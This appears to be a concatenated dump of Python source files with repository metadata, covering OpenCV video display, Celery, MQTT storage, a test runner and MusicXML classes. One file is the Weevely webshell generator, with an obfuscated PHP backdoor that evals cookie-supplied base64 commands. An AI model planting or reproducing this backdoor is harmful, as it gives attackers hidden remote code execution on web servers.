Frame rate (in frames per second) of the video for time calculation.
source: str
Source of the input images (either "video" or "cam").
"""
# Font settings
font = cv2.FONT_HERSHEY_SIMPLEX
scale = 0.5
thick = 1
glow = 3 * thick
# Color settings
black = (0, 0, 0)
yellow = (0, 255, 255)
# Print the current frame number and timestamp
if source == 'video':
text = 'Frame: {:d}/{:d} {}'.format(frameNum, frameCount - 1,
'(paused)' if paused else '')
else:
text = 'Frame: {:d} {}'.format(frameNum, '(paused)' if paused else '')
size, _ = cv2.getTextSize(text, font, scale, thick)
x = 5
y = frame.shape[0] - 2 * size[1]
cv2.putText(frame, text, (x, y), font, scale, black, glow)
cv2.putText(frame, text, (x, y), font, scale, yellow, thick)
if source == 'video':
timestamp = datetime.min + timedelta(seconds=(frameNum / fps))
elapsedTime = datetime.strftime(timestamp, '%H:%M:%S')
timestamp = datetime.min + timedelta(seconds=(frameCount / fps))
totalTime = datetime.strftime(timestamp, '%H:%M:%S')
text = 'Time: {}/{}'.format(elapsedTime, totalTime)
size, _ = cv2.getTextSize(text, font, scale, thick)
y = frame.shape[0] - 5
cv2.putText(frame, text, (x, y), font, scale, black, glow)
cv2.putText(frame, text, (x, y), font, scale, yellow, thick)
# Print the help message
text = 'Press F1 for help'
size, _ = cv2.getTextSize(text, font, scale, thick)
x = frame.shape[1] - size[0] - 5
y = frame.shape[0] - size[1] + 5
cv2.putText(frame, text, (x, y), font, scale, black, glow)
cv2.putText(frame, text, (x, y), font, scale, yellow, thick)
#---------------------------------------------
def showHelp(windowTitle, shape):
"""
Displays an image with helping text.
Parameters
----------
windowTitle: str
Title of the window where to display the help
shape: tuple
Height and width of the window to create the help image.
"""
# Font settings
font = cv2.FONT_HERSHEY_SIMPLEX
scale = 1.0
thick = 1
# Color settings
black = (0, 0, 0)
red = (0, 0, 255)
# Create the background image
image = np.ones((shape[0], shape[1], 3)) * 255
# The help text is printed in one line per item in this list
helpText = [
'Controls:',
'-----------------------------------------------',
'[q] or [ESC]: quits from the application.',
'[p]: toggles paused/playing the video/webcam input.',
'[r]: restarts the video playback (video input only).',
'[left/right arrow]: displays the previous/next frame (video input only).',
'[page-up/down]: rewinds/fast forwards by 10 seconds (video input only).',
' ',
' ',
'Press any key to close this window...'
]
# Print the controls help text
xCenter = image.shape[1] // 2
yCenter = image.shape[0] // 2
margin = 20 # between-lines margin in pixels
textWidth = 0
textHeight = margin * (len(helpText) - 1)
lineHeight = 0
for line in helpText:
size, _ = cv2.getTextSize(line, font, scale, thick)
textHeight += size[1]
textWidth = size[0] if size[0] > textWidth else textWidth
lineHeight = size[1] if size[1] > lineHeight else lineHeight
x = xCenter - textWidth // 2
y = yCenter - textHeight // 2
for line in helpText:
cv2.putText(image, line, (x, y), font, scale, black, thick * 3)
cv2.putText(image, line, (x, y), font, scale, red, thick)
y += margin + lineHeight
# Show the image and wait for a key press
cv2.imshow(windowTitle, image)
cv2.waitKey(0)
#---------------------------------------------
def parseCommandLine(argv):
"""
Parse the command line of this utility application.
This function uses the argparse package to handle the command line
arguments. In case of command line errors, the application will be
automatically terminated.
Parameters
------
argv: list of str
Arguments received from the command line.
Returns
------
object
Object with the parsed arguments as attributes (refer to the
documentation of the argparse package for details)
"""
parser = argparse.ArgumentParser(description='Tests the face and emotion '
'detector on a video file input.')
parser.add_argument('source', nargs='?', const='Yes',
choices=['video', 'cam'], default='cam',
help='Indicate the source of the input images for '
'the detectors: "video" for a video file or '
'"cam" for a webcam. The default is "cam".')
parser.add_argument('-f', '--file', metavar='<name>',
help='Name of the video file to use, if the source is '
'"video". The supported formats depend on the codecs '
'installed in the operating system.')
parser.add_argument('-i', '--id', metavar='<number>', default=0, type=int,
help='Numerical id of the webcam to use, if the source '
'is "cam". The default is 0.')
args = parser.parse_args()
if args.source == 'video' and args.file is None:
parser.error('-f is required when source is "video"')
return args
#---------------------------------------------
# namespace verification for invoking main
#---------------------------------------------
if __name__ == '__main__':
main(sys.argv[1:]) | 31.924453 | 80 | 0.5482 | 4,629 | 0.288268 | 0 | 0 | 0 | 0 | 0 | 0 | 6,586 | 0.410138 |
dc1410a8579c40952f7be96924032fe936ce5616 | 56 | py | Python | konform/cmd.py | openanalytics/konform | 8691575ec94e753987bf4748ac279b1510b6e04a | [
"Apache-2.0"
]
| 7 | 2021-02-23T12:08:01.000Z | 2022-03-12T01:52:35.000Z | konform/cmd.py | openanalytics/konform | 8691575ec94e753987bf4748ac279b1510b6e04a | [
"Apache-2.0"
]
| 1 | 2022-03-11T21:53:18.000Z | 2022-03-11T21:53:18.000Z | konform/cmd.py | openanalytics/konform | 8691575ec94e753987bf4748ac279b1510b6e04a | [
"Apache-2.0"
]
| 1 | 2021-05-07T20:13:30.000Z | 2021-05-07T20:13:30.000Z | from . import Konform
def main():
Konform().run()
| 9.333333 | 21 | 0.607143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
dc1615d2555d04af3309f9652b1529186785aefa | 1,711 | py | Python | ichnaea/taskapp/app.py | mikiec84/ichnaea | ec223cefb788bb921c0e7f5f51bd3b20eae29edd | [
"Apache-2.0"
]
| 348 | 2015-01-13T11:48:07.000Z | 2022-03-31T08:33:07.000Z | ichnaea/taskapp/app.py | mikiec84/ichnaea | ec223cefb788bb921c0e7f5f51bd3b20eae29edd | [
"Apache-2.0"
]
| 1,274 | 2015-01-02T18:15:56.000Z | 2022-03-23T15:29:08.000Z | ichnaea/taskapp/app.py | mikiec84/ichnaea | ec223cefb788bb921c0e7f5f51bd3b20eae29edd | [
"Apache-2.0"
]
| 149 | 2015-01-04T21:15:07.000Z | 2021-12-10T06:05:09.000Z | """
Holds global celery application state and startup / shutdown handlers.
"""
from celery import Celery
from celery.app import app_or_default
from celery.signals import (
beat_init,
worker_process_init,
worker_process_shutdown,
setup_logging,
)
from ichnaea.log import configure_logging
from ichnaea.taskapp.config import (
configure_celery,
init_beat,
init_worker,
shutdown_worker,
)
@setup_logging.connect
def setup_logging_process(loglevel, logfile, format, colorize, **kwargs):
"""Called at scheduler and worker setup.
Configures logging using the same configuration as the webapp.
"""
configure_logging()
@beat_init.connect
def init_beat_process(signal, sender, **kw):
"""
Called automatically when `celery beat` is started.
Calls :func:`ichnaea.taskapp.config.init_beat`.
"""
celery_app = app_or_default()
init_beat(sender, celery_app)
@worker_process_init.connect
def init_worker_process(signal, sender, **kw):
"""
Called automatically when `celery worker` is started. This is executed
inside each forked worker process.
Calls :func:`ichnaea.taskapp.config.init_worker`.
"""
# get the app in the current worker process
celery_app = app_or_default()
init_worker(celery_app)
@worker_process_shutdown.connect
def shutdown_worker_process(signal, sender, **kw):
"""
Called automatically when `celery worker` is stopped. This is executed
inside each forked worker process.
Calls :func:`ichnaea.taskapp.config.shutdown_worker`.
"""
celery_app = app_or_default()
shutdown_worker(celery_app)
celery_app = Celery("ichnaea.taskapp.app")
configure_celery(celery_app)
| 24.442857 | 74 | 0.733489 | 0 | 0 | 0 | 0 | 1,205 | 0.704267 | 0 | 0 | 742 | 0.433665 |
dc16a13d387c0b0bc002823fb7755299735633f4 | 1,771 | py | Python | gmqtt/storage.py | sabuhish/gmqtt | b88aaaaa88b0d8eb1e2757a327060298524a976a | [
"MIT"
]
| null | null | null | gmqtt/storage.py | sabuhish/gmqtt | b88aaaaa88b0d8eb1e2757a327060298524a976a | [
"MIT"
]
| null | null | null | gmqtt/storage.py | sabuhish/gmqtt | b88aaaaa88b0d8eb1e2757a327060298524a976a | [
"MIT"
]
| null | null | null | import asyncio
from typing import Tuple
import heapq
class BasePersistentStorage(object):
async def push_message(self, mid, raw_package):
raise NotImplementedError
def push_message_nowait(self, mid, raw_package) -> asyncio.Future:
try:
asyncio.get_event_loop()
except RuntimeError as err:
if "There is no current event loop in thread" in str(err):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return asyncio.ensure_future(self.push_message(mid, raw_package))
async def pop_message(self) -> Tuple[int, bytes]:
raise NotImplementedError
async def remove_message_by_mid(self, mid):
raise NotImplementedError
@property
async def is_empty(self) -> bool:
raise NotImplementedError
class HeapPersistentStorage(BasePersistentStorage):
def __init__(self, timeout):
self._queue = []
self._timeout = timeout
async def push_message(self, mid, raw_package):
tm = asyncio.get_event_loop().time()
heapq.heappush(self._queue, (tm, mid, raw_package))
async def pop_message(self):
current_time = asyncio.get_event_loop().time()
(tm, mid, raw_package) = heapq.heappop(self._queue)
if current_time - tm > self._timeout:
return mid, raw_package
else:
heapq.heappush(self._queue, (tm, mid, raw_package))
return None
async def remove_message_by_mid(self, mid):
message = next(filter(lambda x: x[1] == mid, self._queue), None)
if message:
self._queue.remove(message)
heapq.heapify(self._queue)
@property
async def is_empty(self):
return not bool(self._queue)
| 29.032787 | 73 | 0.648786 | 1,711 | 0.966121 | 0 | 0 | 157 | 0.08865 | 1,059 | 0.597967 | 42 | 0.023715 |
dc16d9cdd8796257d1bb841212fc202433a9eade | 10,638 | py | Python | test/testframework/runner.py | 5GExchange/escape | eb35d460597a0386b18dd5b6a5f62a3f30eed5fa | [
"Apache-2.0"
]
| 10 | 2016-11-16T16:26:16.000Z | 2021-04-26T17:20:28.000Z | test/testframework/runner.py | 5GExchange/escape | eb35d460597a0386b18dd5b6a5f62a3f30eed5fa | [
"Apache-2.0"
]
| 3 | 2017-04-20T11:29:17.000Z | 2017-11-06T17:12:12.000Z | test/testframework/runner.py | 5GExchange/escape | eb35d460597a0386b18dd5b6a5f62a3f30eed5fa | [
"Apache-2.0"
]
| 10 | 2017-03-27T13:58:52.000Z | 2020-06-24T22:42:51.000Z | # Copyright 2017 Lajos Gerecs, Janos Czentye
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import importlib
import logging
import os
import sys
import threading
from collections import Iterable
import pexpect
import yaml
from yaml.error import YAMLError
log = logging.getLogger()
class Tee(object):
"""
Inspired by the bash command: tee
tee - read from standard input and write to standard output and files
"""
def __init__ (self, filename):
super(Tee, self).__init__()
self.file = open(filename, mode="w", buffering=0)
self.stdout = sys.stdout
sys.stdout = self
def __del__ (self):
sys.stdout = self.stdout
self.file.close()
def write (self, data):
self.file.write(data)
self.stdout.write(data)
def __enter__ (self):
return self
def __exit__ (self, exc_type, exc_val, exc_tb):
self.__del__()
class EscapeRunResult():
"""
Container class for storing the result of the test run.
"""
def __init__ (self, output=None, exception=None):
self.log_output = output
self.exception = exception
def was_error (self):
return self.exception is not None
def __iter__ (self):
return iter(self.log_output)
class CommandRunner(object):
"""
Main runner class which capable of running the test script and kill the
process explicitly or based on the timeout value.
"""
KILL_TIMEOUT = 60
def __init__ (self, cmd, cwd=None, kill_timeout=None, output_stream=None):
self._command = self.__evaluate_cmd(cmd)
self._cwd = cwd if cwd else os.path.dirname(__file__)
self.kill_timeout = kill_timeout if kill_timeout else self.KILL_TIMEOUT
self.output_stream = output_stream
self._process = None
self.__killed = False
def __str__ (self):
return "%s(cmd: %s, timeout: %s)" % (
self.__class__.__name__, self._command, self.kill_timeout)
@property
def is_killed (self):
return self.__killed
@property
def is_alive (self):
return self._process and self._process.isalive()
@staticmethod
def __evaluate_cmd (cmd):
"""
Split command to list for pexpect.
:param cmd: str or list
:rtype: list[str]
"""
if isinstance(cmd, basestring):
return cmd.split(' ')
elif isinstance(cmd, Iterable):
return list(cmd)
else:
return None
def execute (self):
"""
Create and start the process. Block until the process ends or timeout is
exceeded.
"""
try:
self._process = pexpect.spawn(self._command[0],
args=self._command[1:],
timeout=self.kill_timeout,
cwd=self._cwd,
logfile=self.output_stream)
self._process.expect(pexpect.EOF)
return self
except pexpect.TIMEOUT:
log.debug("Process running timeout(%ss) is exceeded!" % self.kill_timeout)
self.kill_process()
except pexpect.ExceptionPexpect as e:
log.error("Got unexpected error:\n%s" % e)
self.kill_process()
def kill_process (self):
"""
Kill the process and call the optional hook function.
"""
log.debug("Kill process...")
self.stop()
self.__killed = True
if self.is_alive:
self._process.terminate(force=True)
def stop (self):
"""
Stop the process.
:return: None
"""
log.debug("Terminate program under test: %s" % self)
if self._process:
self._process.sendcontrol('c')
if self.is_alive:
self._process.terminate()
def get_process_output_stream (self):
"""
:return: Return with the process buffer.
"""
return self._process.before if self._process.before else ""
def clone (self):
return copy.deepcopy(self)
def cleanup (self):
log.debug("Cleanup %s..." % self.__class__.__name__)
self._process = None
self.__killed = False
self.__killed = False
pass
class ESCAPECommandRunner(CommandRunner):
"""
Extended CommandRunner class for ESCAPE.
Use threading.Event for signalling ESCAPE is up.
"""
ESC_PARAM_QUIT = "--quit"
ESC_PARAM_SERVICE = "--service"
def __init__ (self, *args, **kwargs):
super(ESCAPECommandRunner, self).__init__(*args, **kwargs)
self.__ready = threading.Event()
self.timeouted = False
@property
def timeout_exceeded (self):
return self.timeouted
def setup_verbose_logging (self):
log.debug("Detect VERBOSE mode --> Add more 'debug' flag")
self._command.extend(('--debug',) * 2)
def setup_standalone_mode (self):
log.debug("Detected standalone mode --> Disable timeout")
self.kill_timeout = None
log.debug("Remove quit mode, add ROS-API")
self._command.extend(("++quit", "--rosapi"))
def execute (self, wait_for_up=True):
"""
Create and start the process. Block until the process ends or timeout is
exceeded.
"""
log.debug("\nStart program under test...")
log.debug(self._command)
try:
self._process = pexpect.spawn(self._command[0],
args=self._command[1:],
timeout=self.kill_timeout,
cwd=self._cwd,
logfile=self.output_stream)
if wait_for_up:
self._process.expect(pattern="ESCAPEv2 is up")
self.__ready.set()
self._process.expect(pexpect.EOF)
return self
except pexpect.TIMEOUT:
log.debug("Process running timeout(%ss) is exceeded!" % self.kill_timeout)
self.kill_process()
self.timeouted = True
except pexpect.ExceptionPexpect as e:
log.error("Got unexpected error:\n%s" % e.message)
log.debug("\n\nError details:\n%s" % self._process.before)
self.kill_process()
def test (self, timeout=CommandRunner.KILL_TIMEOUT):
"""
Start a presumably simple process and test if the process is executed
successfully within the timeout interval or been killed.
:param timeout: use the given timeout instead of the default kill timeout
:type timeout: int
:return: the process is stopped successfully
:rtype: bool
"""
try:
proc = pexpect.spawn(self._command[0],
args=self._command[1:],
cwd=self._cwd,
timeout=timeout)
proc.expect(pexpect.EOF)
return True
except pexpect.ExceptionPexpect:
return False
def wait_for_ready (self):
log.debug("Waiting for ESCAPE...")
self.__ready.wait(timeout=self.kill_timeout)
log.debug("ESCAPE is up! ")
def kill_process (self):
# Call super explicitly because _process is defined in the parent class
# so from child class process cannot be terminated
super(ESCAPECommandRunner, self).kill_process()
def stop (self):
# Call super explicitly because _process is defined in the parent class
# so from child class process cannot be terminated
super(ESCAPECommandRunner, self).stop()
def reset(self):
log.debug("Reset %s status..." % self.__class__.__name__)
self.timeouted = False
self.__ready.clear()
class RunnableTestCaseInfo(object):
"""
Container class for storing the relevant information and config values of a
test case.
"""
CONFIG_FILE_NAME = "test-config.yaml"
CONFIG_CONTAINER_NAME = "test"
RUNNER_SCRIPT_NAME = "run.sh"
README_FILE_NAME = "README.txt"
def __init__ (self, case_path):
# Removing trailing slash
self.__case_path = os.path.normpath(case_path)
self.sub_name = None
log.debug("Reading testcase cfg from: %s" % self.full_testcase_path)
@property
def testcase_dir_name (self):
"""
:return: directory name of the test case
:rtype: str
"""
return os.path.basename(self.__case_path)
@property
def name (self):
if self.sub_name is not None:
return "%s-%s" % (self.testcase_dir_name, self.sub_name)
else:
return self.testcase_dir_name
@property
def full_testcase_path (self):
"""
:return: absolute path of the test case directory.
:rtype: str
"""
return self.__case_path
@property
def test_command (self):
"""
:return: absolute command path of the test case runner script.
:rtype: str
"""
return os.path.join(self.full_testcase_path,
self.RUNNER_SCRIPT_NAME)
@property
def config_file_name (self):
"""
:return: absolute path of the test case config file.
:rtype: str
"""
return os.path.join(self.full_testcase_path,
self.CONFIG_FILE_NAME)
def readme (self):
"""
:return: load the README file
:rtype: str
"""
with open(os.path.join(self.full_testcase_path,
self.README_FILE_NAME)) as f:
readme = f.read()
return readme if readme else ""
def load_test_case_class (self):
"""
:return: Return the TestCase class and it's parameters defined in the
test case config file
:rtype: tuple(object, dict)
"""
test_args = {}
try:
with open(self.config_file_name, 'r') as f:
config = yaml.safe_load(f)
except (IOError, YAMLError) as e:
log.error("Failed to load configuration file: %s" % e)
return None
if self.CONFIG_CONTAINER_NAME in config:
test_args = copy.copy(config[self.CONFIG_CONTAINER_NAME])
try:
m = test_args.pop('module')
c = test_args.pop('class')
return getattr(importlib.import_module(m), c), test_args
except (KeyError, ImportError):
pass
return None, test_args
def load_config (self):
try:
with open(self.config_file_name, 'r') as f:
config = yaml.safe_load(f)
except (IOError, YAMLError) as e:
log.error("Failed to load configuration file: %s" % e)
return None
try:
test_args = copy.copy(config[self.CONFIG_CONTAINER_NAME])
return test_args
except KeyError:
pass
return None
def __repr__ (self):
return "RunnableTestCase [%s]" % self.testcase_dir_name
def clone (self):
return copy.deepcopy(self)
| 28.142857 | 80 | 0.650498 | 9,832 | 0.924234 | 0 | 0 | 1,457 | 0.136962 | 0 | 0 | 3,448 | 0.324121 |
dc1774c173332a4ec6c00f25e59d94cce3123021 | 868 | py | Python | Calliope/13 Clock/Clock.py | frankyhub/Python | 323ef1399efcbc24ddc66ad069ff99b4999fff38 | [
"MIT"
]
| null | null | null | Calliope/13 Clock/Clock.py | frankyhub/Python | 323ef1399efcbc24ddc66ad069ff99b4999fff38 | [
"MIT"
]
| null | null | null | Calliope/13 Clock/Clock.py | frankyhub/Python | 323ef1399efcbc24ddc66ad069ff99b4999fff38 | [
"MIT"
]
| null | null | null | from microbit import *
hands = Image.ALL_CLOCKS
#A centre dot of brightness 2.
ticker_image = Image("2\n").crop(-2,-2,5,5)
#Adjust these to taste
MINUTE_BRIGHT = 0.1111
HOUR_BRIGHT = 0.55555
#Generate hands for 5 minute intervals
def fiveticks():
fivemins = 0
hours = 0
while True:
yield hands[fivemins]*MINUTE_BRIGHT + hands[hours]*HOUR_BRIGHT
fivemins = (fivemins+1)%12
hours = (hours + (fivemins == 0))%12
#Generate hands with ticker superimposed for 1 minute intervals.
def ticks():
on = True
for face in fiveticks():
for i in range(5):
if on:
yield face + ticker_image
else:
yield face - ticker_image
on = not on
#Run a clock speeded up 60 times, so we can watch the animation.
for tick in ticks():
display.show(tick)
sleep(200) | 24.8 | 71 | 0.624424 | 0 | 0 | 442 | 0.509217 | 0 | 0 | 0 | 0 | 223 | 0.256912 |
dc18cde3ecea098343bc73407dcfa2ce64cc68f5 | 528 | py | Python | home/kakadu31/sabertooth.py | rv8flyboy/pyrobotlab | 4e04fb751614a5cb6044ea15dcfcf885db8be65a | [
"Apache-2.0"
]
| 63 | 2015-02-03T18:49:43.000Z | 2022-03-29T03:52:24.000Z | home/kakadu31/sabertooth.py | hirwaHenryChristian/pyrobotlab | 2debb381fc2db4be1e7ea6e5252a50ae0de6f4a9 | [
"Apache-2.0"
]
| 16 | 2016-01-26T19:13:29.000Z | 2018-11-25T21:20:51.000Z | home/kakadu31/sabertooth.py | hirwaHenryChristian/pyrobotlab | 2debb381fc2db4be1e7ea6e5252a50ae0de6f4a9 | [
"Apache-2.0"
]
| 151 | 2015-01-03T18:55:54.000Z | 2022-03-04T07:04:23.000Z | #Variables
#Working with build 2234
saberPort = "/dev/ttyUSB0"
#Initializing Motorcontroller
saber = Runtime.start("saber", "Sabertooth")
saber.connect(saberPort)
sleep(1)
#Initializing Joystick
joystick = Runtime.start("joystick","Joystick")
print(joystick.getControllers())
python.subscribe("joystick","publishJoystickInput")
joystick.setController(0)
for x in range(0,100):
print("power", x)
saber.driveForwardMotor1(x)
sleep(0.5)
for x in range(100,-1,-1):
print("power", x)
saber.driveForwardMotor1(x)
sleep(0.5)
| 21.12 | 51 | 0.751894 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 184 | 0.348485 |
dc19222afbe13a4d5207f36ba7d56c249b5d6019 | 4,542 | py | Python | Dangerous/Weevely/core/backdoor.py | JeyZeta/Dangerous- | 824ea6b571eda98bb855f176361e9b35dfda578e | [
"MIT"
]
| null | null | null | Dangerous/Weevely/core/backdoor.py | JeyZeta/Dangerous- | 824ea6b571eda98bb855f176361e9b35dfda578e | [
"MIT"
]
| null | null | null | Dangerous/Weevely/core/backdoor.py | JeyZeta/Dangerous- | 824ea6b571eda98bb855f176361e9b35dfda578e | [
"MIT"
]
| 1 | 2018-07-04T18:35:16.000Z | 2018-07-04T18:35:16.000Z | # -*- coding: utf-8 -*-
# This file is part of Weevely NG.
#
# Copyright(c) 2011-2012 Weevely Developers
# http://code.google.com/p/weevely/
#
# This file may be licensed under the terms of of the
# GNU General Public License Version 2 (the ``GPL'').
#
# Software distributed under the License is distributed
# on an ``AS IS'' basis, WITHOUT WARRANTY OF ANY KIND, either
# express or implied. See the GPL for the specific language
# governing rights and limitations.
#
# You should have received a copy of the GPL along with this
# program. If not, go to http://www.gnu.org/licenses/gpl.html
# or write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
import base64, codecs
from random import random, randrange, choice, shuffle
from pollution import pollute_with_static_str
from core.utils import randstr
from core.moduleexception import ModuleException
from string import Template, ascii_letters, digits
PERMITTED_CHARS = ascii_letters + digits + '_.~'
WARN_SHORT_PWD = 'Invalid password, use words longer than 3 characters'
WARN_CHARS = 'Invalid password, password permitted chars are \'%s\'' % PERMITTED_CHARS
class BdTemplate(Template):
delimiter = '%'
class Backdoor:
payload_template= """
$c='count';
$a=$_COOKIE;
if(reset($a)=='%STARTKEY' && $c($a)>3){
$k='%ENDKEY';
echo '<'.$k.'>';
eval(base64_decode(preg_replace(array('/[^\w=\s]/','/\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));
echo '</'.$k.'>';
}
"""
backdoor_template = """<?php
$%PAY_VAR1="%PAY1";
$%PAY_VAR2="%PAY2";
$%PAY_VAR3="%PAY3";
$%PAY_VAR4="%PAY4";
$%REPL_FUNC = str_replace("%REPL_POLL","","%REPL_ENC");
$%B64_FUNC = $%REPL_FUNC("%B64_POLL", "", "%B64_ENC");
$%CREAT_FUNC = $%REPL_FUNC("%CREAT_POLL","","%CREAT_ENC");
$%FINAL_FUNC = $%CREAT_FUNC('', $%B64_FUNC($%REPL_FUNC("%PAY_POLL", "", $%PAY_VAR1.$%PAY_VAR2.$%PAY_VAR3.$%PAY_VAR4))); $%FINAL_FUNC();
?>"""
def __init__( self, password ):
self.__check_pwd(password)
self.password = password
self.start_key = self.password[:2]
self.end_key = self.password[2:]
self.payload = BdTemplate(self.payload_template).substitute(STARTKEY = self.start_key, ENDKEY = self.end_key).replace( '\n', '' )
self.backdoor = self.encode_template()
def __str__( self ):
return self.backdoor
def __check_pwd(self, password):
if len(password)<4:
raise ModuleException('generate','\'%s\' %s' % (password, WARN_SHORT_PWD))
if ''.join(c for c in password if c not in PERMITTED_CHARS):
raise ModuleException('generate','\'%s\' %s' % (password, WARN_CHARS))
def encode_template(self):
b64_new_func_name = randstr()
b64_pollution, b64_polluted = pollute_with_static_str('base64_decode',frequency=0.7)
createfunc_name = randstr()
createfunc_pollution, createfunc_polluted = pollute_with_static_str('create_function',frequency=0.7)
payload_var = [ randstr() for st in range(4) ]
payload_pollution, payload_polluted = pollute_with_static_str(base64.b64encode(self.payload))
replace_new_func_name = randstr()
repl_pollution, repl_polluted = pollute_with_static_str('str_replace',frequency=0.7)
final_func_name = randstr()
length = len(payload_polluted)
offset = 7
piece1 = length / 4 + randrange(-offset,+offset)
piece2 = length / 2 + randrange(-offset,+offset)
piece3 = length*3/4 + randrange(-offset,+offset)
ts_splitted = self.backdoor_template.splitlines()
ts_shuffled = ts_splitted[1:6]
shuffle(ts_shuffled)
ts_splitted = [ts_splitted[0]] + ts_shuffled + ts_splitted[6:]
self.backdoor_template = '\n'.join(ts_splitted)
return BdTemplate(self.backdoor_template).substitute(
B64_FUNC = b64_new_func_name,
B64_ENC = b64_polluted,
B64_POLL = b64_pollution,
CREAT_FUNC = createfunc_name,
CREAT_ENC = createfunc_polluted,
CREAT_POLL = createfunc_pollution,
REPL_FUNC = replace_new_func_name,
REPL_ENC = repl_polluted,
REPL_POLL = repl_pollution,
PAY_VAR1 = payload_var[0],
PAY_VAR2 = payload_var[1],
PAY_VAR3 = payload_var[2],
PAY_VAR4 = payload_var[3],
PAY_POLL = payload_pollution,
PAY1 = payload_polluted[:piece1],
PAY2 = payload_polluted[piece1:piece2],
PAY3 = payload_polluted[piece2:piece3],
PAY4 = payload_polluted[piece3:],
FINAL_FUNC = final_func_name)
| 34.409091 | 137 | 0.674373 | 3,361 | 0.739982 | 0 | 0 | 0 | 0 | 0 | 0 | 1,536 | 0.338177 |
dc19c0faf717f2a11500ab0d47cd0b71aa1f7557 | 4,638 | py | Python | musicscore/musicxml/types/complextypes/notations.py | alexgorji/music_score | b4176da52295361f3436826903485c5cb8054c5e | [
"MIT"
]
| 2 | 2020-06-22T13:33:28.000Z | 2020-12-30T15:09:00.000Z | musicscore/musicxml/types/complextypes/notations.py | alexgorji/music_score | b4176da52295361f3436826903485c5cb8054c5e | [
"MIT"
]
| 37 | 2020-02-18T12:15:00.000Z | 2021-12-13T20:01:14.000Z | musicscore/musicxml/types/complextypes/notations.py | alexgorji/music_score | b4176da52295361f3436826903485c5cb8054c5e | [
"MIT"
]
| null | null | null | from musicscore.dtd.dtd import Sequence, GroupReference, Choice, Element
from musicscore.musicxml.attributes.optional_unique_id import OptionalUniqueId
from musicscore.musicxml.attributes.printobject import PrintObject
from musicscore.musicxml.groups.common import Editorial
from musicscore.musicxml.elements.xml_element import XMLElement
from musicscore.musicxml.types.complextypes.arpeggiate import ComplexTypeArpeggiate
from musicscore.musicxml.types.complextypes.articulations import ComplexTypeArticulations
from musicscore.musicxml.types.complextypes.complextype import ComplexType
from musicscore.musicxml.types.complextypes.dynamics import Dynamics
from musicscore.musicxml.types.complextypes.fermata import ComplexTypeFermata
from musicscore.musicxml.types.complextypes.ornaments import ComplexTypeOrnaments
from musicscore.musicxml.types.complextypes.slide import ComplexTypeSlide
from musicscore.musicxml.types.complextypes.slur import ComplexTypeSlur
from musicscore.musicxml.types.complextypes.technical import ComplexTypeTechnical
from musicscore.musicxml.types.complextypes.tied import ComplexTypeTied
from musicscore.musicxml.types.complextypes.tuplet import ComplexTypeTuplet
class Tied(ComplexTypeTied):
""""""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
class Slur(ComplexTypeSlur):
_TAG = 'slur'
def __init__(self, type, *args, **kwargs):
super().__init__(tag=self._TAG, type=type, *args, **kwargs)
class Tuplet(ComplexTypeTuplet):
""""""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
class Glissando(XMLElement):
""""""
def __init__(self, value, *args, **kwargs):
super().__init__(tag='glissando', value=value, *args, **kwargs)
raise NotImplementedError()
class Slide(ComplexTypeSlide):
""""""
_TAG = 'slide'
def __init__(self, type, *args, **kwargs):
super().__init__(tag=self._TAG, type=type, *args, **kwargs)
class Ornaments(ComplexTypeOrnaments):
""""""
_TAG = 'ornaments'
def __init__(self, *args, **kwargs):
super().__init__(tag=self._TAG, *args, **kwargs)
class Technical(ComplexTypeTechnical):
""""""
_TAG = 'technical'
def __init__(self, *args, **kwargs):
super().__init__(tag=self._TAG, *args, **kwargs)
class Articulations(ComplexTypeArticulations):
""""""
_TAG = 'articulations'
def __init__(self, *args, **kwargs):
super().__init__(tag=self._TAG, *args, **kwargs)
class Fermata(ComplexTypeFermata):
""""""
_TAG = 'fermata'
def __init__(self, value='normal', *args, **kwargs):
super().__init__(tag=self._TAG, value=value, *args, **kwargs)
class Arpeggiate(ComplexTypeArpeggiate):
""""""
_TAG = 'arpeggiate'
def __init__(self, *args, **kwargs):
super().__init__(tag=self._TAG, *args, **kwargs)
class NonArpeggiate(XMLElement):
""""""
def __init__(self, value, *args, **kwargs):
super().__init__(tag='non-arpeggiate', value=value, *args, **kwargs)
raise NotImplementedError()
class AccidentalMark(XMLElement):
""""""
def __init__(self, value, *args, **kwargs):
super().__init__(tag='accidental-mark', value=value, *args, **kwargs)
raise NotImplementedError()
class OtherNotation(XMLElement):
""""""
def __init__(self, value, *args, **kwargs):
super().__init__(tag='other-notation', value=value, *args, **kwargs)
raise NotImplementedError()
class ComplexTypeNotations(ComplexType, PrintObject, OptionalUniqueId):
"""
Notations refer to musical notations, not XML notations. Multiple notations are allowed in order to represent
multiple editorial levels. The print-object attribute, added in Version 3.0, allows notations to represent details
of performance technique, such as fingerings, without having them appear in the score.
"""
_DTD = Sequence(
GroupReference(Editorial),
Choice(
Element(Tied),
Element(Slur),
Element(Tuplet),
Element(Glissando),
Element(Slide),
Element(Ornaments),
Element(Technical),
Element(Articulations),
Element(Dynamics),
Element(Fermata),
Element(Arpeggiate),
Element(NonArpeggiate),
Element(AccidentalMark),
Element(OtherNotation),
min_occurrence=0,
max_occurrence=None
)
)
def __init__(self, *args, **kwargs):
super().__init__(tag='notations', *args, **kwargs)
| 30.715232 | 118 | 0.684994 | 3,403 | 0.733721 | 0 | 0 | 0 | 0 | 0 | 0 | 557 | 0.120095 |
904fd225f8fe0b9727c74b7b31cf0eb0c1430fbd | 794 | py | Python | src/constants.py | MitraSeifari/pystackoverflow | 70da1c6a8407df34496fe9843e8ae7f4c15aac0e | [
"MIT"
]
| null | null | null | src/constants.py | MitraSeifari/pystackoverflow | 70da1c6a8407df34496fe9843e8ae7f4c15aac0e | [
"MIT"
]
